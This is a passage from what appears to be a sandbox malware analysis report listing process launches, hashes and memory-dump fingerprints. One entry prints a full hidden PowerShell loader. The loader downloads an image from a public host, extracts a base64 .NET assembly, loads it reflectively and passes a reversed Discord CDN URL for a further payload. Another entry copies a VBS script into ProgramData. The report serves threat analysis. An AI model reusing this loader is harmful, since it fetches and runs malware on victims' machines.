        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:09:21:03
        Start date:27/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff66e660000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:5
        Start time:09:21:04
        Start date:27/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
        Imagebase:0x7ff6e3d50000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:7
        Start time:09:21:21
        Start date:27/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
        Imagebase:0x7ff6e3d50000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:8
        Start time:09:21:21
        Start date:27/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff66e660000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:11
        Start time:09:21:31
        Start date:27/05/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Imagebase:0x7ff7f0170000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:13
        Start time:09:21:40
        Start date:27/05/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Imagebase:0x7ff7f0170000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >
          Memory Dump Source
          • Source File: 00000003.00000002.2713193563.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ffd34480000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
          • Instruction ID: f42c76e4643653e2a2e8dd65be194d2de7f97e09ccad9e6cb572c92ef7916f74
          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
          • Instruction Fuzzy Hash: 7701A77020CB0C4FDB44EF0CE051AA6B3E0FB95324F10056DE58AC3661D636E882CB41
          Strings
          Memory Dump Source
          • Source File: 00000003.00000002.2713193563.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ffd34480000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: ,L_^$-L_^
          • API String ID: 0-2978936201
          • Opcode ID: 926ccbec6483b1d20b276c99009a9e06217e8e9ce835e0d4ff81457908d4b334
          • Instruction ID: 59f4cd103b0cc1257040c6c0fa04b40794243ceb76f91356d232eb7f41f8daa5
          • Opcode Fuzzy Hash: 926ccbec6483b1d20b276c99009a9e06217e8e9ce835e0d4ff81457908d4b334
          • Instruction Fuzzy Hash: D7517957A0D7D61AE763623C28F61DA3FD4DF53268B0E10F7C6D4CE097AD4D280AA252
          Memory Dump Source
          • Source File: 00000003.00000002.2713193563.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_2_7ffd34480000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b60811ab906f65cb20a708f1cd9ea85fe23ef02542487cf6dd3eddb0ba1b41e4
          • Instruction ID: 962879a9d33a98b6645b99ded57f946097a5adbfe74c9ce051bffa5098ff906b
          • Opcode Fuzzy Hash: b60811ab906f65cb20a708f1cd9ea85fe23ef02542487cf6dd3eddb0ba1b41e4
          • Instruction Fuzzy Hash: BE515157A0D7D25FE7A3567898BA0E63FE0EF1326470A10F7C6C4CA097DD5E180A9352
          Memory Dump Source
          • Source File: 00000007.00000002.2325945428.00007FFD34460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34460000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_7ffd34460000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c4f30ca18ff8219798573b9cdcc67ed67874228a560523f69d33ab194934028a
          • Instruction ID: 39520e04120d1db9264ecb19ecf7e1912a5dac09770773c44d1e190cec58cf7c
          • Opcode Fuzzy Hash: c4f30ca18ff8219798573b9cdcc67ed67874228a560523f69d33ab194934028a
          • Instruction Fuzzy Hash: 7A31AE26B0E3D20FE7178AA858A70E47FA0DF1323474A01FBC5C5CB4A7E94D680B8761
          Memory Dump Source
          • Source File: 00000007.00000002.2325945428.00007FFD34460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34460000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_7ffd34460000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
          • Instruction ID: 8f0ca5734a9019a7b15d9af88f1224151fdf7fb8deee0b93e493bcebc8800802
          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
          • Instruction Fuzzy Hash: 6901A77020CB0C4FDB44EF0CE051AA5B3E0FB95324F10056DE58AC3661DA36E882CB41